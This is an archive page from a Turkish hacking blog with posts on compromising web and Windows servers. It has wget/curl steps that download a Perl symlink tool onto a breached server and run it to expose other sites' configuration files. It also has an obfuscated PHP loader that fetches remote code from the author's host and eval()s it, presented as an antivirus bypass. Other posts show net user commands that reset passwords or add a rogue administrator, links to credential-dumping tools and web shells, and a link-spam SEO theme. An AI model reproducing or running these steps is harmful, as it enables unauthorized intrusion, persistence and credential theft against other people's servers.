Güncell Konular ;

Archive for Temmuz 2019





Genellikle Apache Sunucularda İşinizce yarıcak bu araç symlink in symlink komutunu kullanmadan
işlemi yaptığı için per olan tüm sunucularda kolaylıkla çalıştırabilirsiniz kullanımına geçelim,


Shell ekranındaydan ya backconnect olup yada cgi shell yiyorsa cgi ekranından altta verdiğim komutları sırasıyla girmeniz yeterlidir.
KOMUTLAR :

$ wget https://b0ru70.github.io/Exploit/UploadExploit/prvsym.pl

eğer sunucuda wget çalışmıyosa;

$ curl -O https://b0ru70.github.io/Exploit/UploadExploit/prvsym.pl

Gerekli aracımızı sunucuya çektik şimdi çalıştıralım

$ perl prvsym.pl

 ardından komutları çalıştırdığınız klosorde b0_sym diye bir klosor olusucak bu klosoru direk url den açın eğer karşınıza config txt leri çıkarsa işlem başarılıdır.

Perl Auto Symlink Tool

28 Temmuz 2019 Pazar

Altta verciğim php kodunu (supershell.php) olarak kaydedip kullanabilirsiniz piyasada bulunan tüm anti li serverleri bypasslamaktadır. [shell yemeyen siteler için]


<?php
$otuzbir = 'ba'.'se'. 128/2 .'_' .'de'.'co'.'de';
$otuziki = ("http://b0ru70.github.io/gg");
$otuzuc = file_get_contents($otuziki);
eval("?>".($otuzbir($otuzuc)));
?>

Küçük Shell -Priv

26 Temmuz 2019 Cuma











Premium Hacklink / SEO Culara özel blogspot temasıdır (.xml) olarak kullanabilirsiniz.

bol bol konu kasıp linkle beslemeniz yeterlidir seo uyumlu olduğu için istediğiniz keyde yükselicektir..

PASTEBİN: https://pastebin.com/raw/603wgerT



Hacklink Blogspot Theme

22 Temmuz 2019 Pazartesi




DAHA ÖNCEDEN ARAÇ TAKVİYESİ OLADAN NASIL ROOT OLABİLCEĞİNİZİ ANLATMIŞTIK = BKNZ

Bu konumuzda sizlere "tool / araç" yardımı ile windows sunucuların root hesap yada içerdeki hesapların (net user) nasıl şifrelerini dğeiştirmeden çekebilceğinizi anlatıcağım.

İlk olarak .aspx shell yiyen windows serverımıza verdiğim wr00t.exe yi upload edin ardından aspx shell imizdeki cmd yerine gelip verdiğim 2 komuttan birini yazın (2 side aynı şeyi yapar.)

 $ wr00t.exe

yada

 $ wr00t

ardından çıktı olarak userları size vericektir genelde root işlemlerini hiçbirini yememiş olan windows sunucularda kullanılan ve az bilinen bir methoddur.

Blog sitemizi takipte kalın daha güzel araşlarında paylaşımı yapılıcaktır..

TOOL İNDİR:


https://anonfile.com/c5tfr00fne/wr00t_exe
https://b0ru70.github.io/Exploit/Kernelr00t/wr00t.zip
https://gofile.io/?c=FTfUqx

Bu şekilde window sunucularda root olabilirsiniz iyi hackingler..

Windows Server Şifresi Öğrenme

20 Temmuz 2019 Cumartesi


Sitede sonsuza dek free diyor.
Sitede yıllık hosting fiyatı 0.1$ mış

ÖZELLİKLERİ:

No Credit Card Required
1000 MB storage
Unlimited bandwidth
2 Email Addresses
2 FTP Account
Website Builder (TRIAL)
Auto Installer
SEO Tools
CDN (Cloud Flare)
Self Backup
Knowledge Base, Email Support
Cloud Linux Limited
No Lite Speed
Standard Drive
1 Data Center
100 MBPS Shared Uplink
99.95% Uptime


Yöntem Yöntem Anlatıcağım Önce Başıt Olandan Başlayayım;



1- EN BASİT YOL:


Upload ettiğiniz shellin terminaline=

$ net user

komutunu girin çıkan kullanıcılardan birini kopyalayın sallıyorum kullanıcı B0RU70 Olsun komutu girip şifresini dğeiştiricez=

$ net user B0RU70 123456

Artından sunucu ip sini uzak masaüstü aracına yapıştırıp id pass ı yazıp sunucuya bağlanın artık rootsunuz.

2- USER EKLE YETKİ VER (BASİT YOL):


İlk önce "net stat" komutunu yazıpp çalştırıpından emin oluyoruz komut çalışıyosa=

$ net user B0RU70 123456!'^+%&/ /add

birdaha "net stat" yazdığımızda b0ru70 die bi kullanıcı oluşturmuş olucaz şimdi ona admin yetkisi verelimki bağlanabilelim=

$ net localgroup Administrators B0RU70 /add

bu yöntemde bu kadar basit.

3- ASPX SHELL KULLANMA:


Yukarda verdiğimim komutlar normal shellinizde çalışmıyorsa size verdiğim shelli indirip onunla çalıştırın ve rootsunuz :)

İNDİR:

1) https://pastebin.com/raw/zfAbgXLi

2) https://anonfile.com/U19fR9y2na/powershell_aspx

3) https://www.pastebinz.com/raw/CLxzmTRNgM



İyi hackingler..

Ayrıntılı Windows Server Rootlama

10 Temmuz 2019 Çarşamba



Öncelikle Bi saçmalığı bitirerek başlıyım makaleme windowsda mac de olduğu gibi linux dada rat ve virüsler bulunmakta anca windows daki kadar yaygın dğeil. yani linux a geçin virüs yemeyin tamamen uydurmadan ibarettir. ancak windows a kıyasla daha az zararlı yazılım olduğu için ve güvenlik sistemi çekirdeği daha gelişmiş olduğu için pentester ve avscan sistemlerinin kullandığı sistem genelde linux dur. Bu Soru işaretini giderdiğimize göre asıl konumuza geçelim;

Neden Linux Kullanıyorum,
Bundan 4 Yıl evvel zaten oyun oynamıyorum boş zaman kaybı diyip  programlamaya odaklandım tamamen ve elimdeki pc suanki kadar iyi olmaması sebebiyle windows da istediğim verimi alamyordum araştırmalarımla "Backbox" u kurdum hem tooları bulunduruyor hemde xfce gibi hafif birt masaüstü olduğu için pcmi artık daha verimli ve daha iyi kullanabiliyordum zamanla elim alıştı artık windows bir pc ye geçince cahil kalıcak hale gleiyorum tamamen linux os a odaklandım. bunun bana faydaları da oldu günümüzdeki hostlar linux genelde. sistemi ne kadar iyi tanırsan method üretmen ve olanları kavrayıp kullanman o kadar kolay oluyor.

Peki Linux a yeni başlayanlara hangi dağıtımları öneririm =

* Ubuntu
* Mint
* Backbox
* Parrot OS
* Fux

Yukarda Verdiğim OS Ları Kullanabilirsiniz.

İyi Şanslar..

Her server in yediği  " .php ve .phtml " uzantılarıyla kullanabilceğiniz bir shelldir. sitede kalıcı olmak istiyorsanız sitenin 2-3 yerine yedekleyip sonra bakmak için kullanabilirsiniz yada hiçbir shell yemiyorsa kullanırsınız.

PASTEBİN: https://www.pastebinz.com/raw/033BrEjM26


İNDİR:



B0RU70 MiNi Priv Shell

8 Temmuz 2019 Pazartesi

<?php



###############################################################

# cPanel Subdomains Creator 1.1

###############################################################

# Visit https://b0ru70.blogspot.com

###############################################################

#

# Can be used in 3 ways:

# 1. just open script in browser and fill the form

# 2. pass all info via url and form will not appear

# Sample: cpanel_subdomains.php?cpaneluser=USER&cpanelpass=PASSWORD&domain=DOMAIN&subdomain=SUBDOMAIN

# 3. list subdomains in file. In this case you must provide all the defaults below

#

# Note: you can omit any parameter, except "subdomain".

# When omitted, default value specified below will be taken

###############################################################



// cpanel user

define('CPANELUSER','user');



// cpanel password

define('CPANELPASS','pass');



// name of the subdomains list file.

// file format may be 1 column or 2 columns divided with semicilon (;)

// Example for two columns:

//   rootdomain1;subdomain1

//   rootdomain1;subdomain2

// Example for one columns:

//   subdomain1

//   subdomain2

define('INPUT_FILE','domains.txt');



// cPanel skin (mainly "x")

// Check http://www.zubrag.com/articles/determine-cpanel-skin.php

// to know it for sure

define('CPANEL_SKIN','x');



// Default domain (subdomains will be created for this domain)

// Will be used if not passed via parameter and not set in subdomains file

define('DOMAIN','');





/////////////// END OF INITIAL SETTINGS ////////////////////////

////////////////////////////////////////////////////////////////



function getVar($name, $def = '') {

  if (isset($_REQUEST[$name]) && ($_REQUEST[$name] != ''))

    return $_REQUEST[$name];

  else

    return $def;

}



$cpaneluser=getVar('cpaneluser', CPANELUSER);

$cpanelpass=getVar('cpanelpass', CPANELPASS);

$cpanel_skin = getVar('cpanelskin', CPANEL_SKIN);



if (isset($_REQUEST["subdomain"])) {

  // get parameters passed via URL or form, emulate string from file

  $doms = array( getVar('domain', DOMAIN) . ";" . $_REQUEST["subdomain"]);

  if (getVar('domain', DOMAIN) == '') die("You must specify domain name");

}

else {

  // open file with domains list

  $doms = @file(INPUT_FILE);

  if (!$doms) {

    // file does not exist, show input form

    echo "

Cannot find input file with subdomains information. It is ok if you are not creating subdomains from file.<br>

Tip: leave field empty to use default value you have specified in the script's code.<br>

<form method='post'>

 Subdomain:<input name='subdomain'><br>

 Domain:<input name='domain'><br>

 cPanel User:<input name='cpaneluser'><br>

 cPanel Password:<input name='cpanelpass'><br>

 cPanel Skin:<input name='cpanelskin'><br>

 <input type='submit' value='Create Subdomain' style='border:1px solid black'>

</form>";

    die();

  }

}



// create subdomain

function subd($host,$port,$ownername,$passw,$request) {



  $sock = fsockopen('localhost',2082);

  if(!$sock) {

    print('Socket error');

    exit();

  }



  $authstr = "$ownername:$passw";

  $pass = base64_encode($authstr);

  $in = "GET $request\r\n";

  $in .= "HTTP/1.0\r\n";

  $in .= "Host:$host\r\n";

  $in .= "Authorization: Basic $pass\r\n";

  $in .= "\r\n";



  fputs($sock, $in);

  while (!feof($sock)) {

    $result .= fgets ($sock,128);

  }

  fclose( $sock );



  return $result;

}



foreach($doms as $dom) {

  $lines = explode(';',$dom);

  if (count($lines) == 2) {

    // domain and subdomain passed

    $domain = trim($lines[0]);

    $subd = trim($lines[1]);

  }

  else {

    // only subdomain passed

    $domain = getVar('domain', DOMAIN);

    $subd = trim($lines[0]);

  }

  // http://[domainhere]:2082/frontend/x/subdomain/doadddomain.html?domain=[subdomain here]&rootdomain=[domain here]

  $request = "/frontend/$cpanel_skin/subdomain/doadddomain.html?rootdomain=$domain&domain=$subd";

  $result = subd('localhost',2082,$cpaneluser,$cpanelpass,$request);

  $show = strip_tags($result);

  echo $show;

}



?>

Sub domain açıcı shell

6 Temmuz 2019 Cumartesi

// 2010- B0RU70 Se☪uЯity - Hacklink Al , B0RU70 \\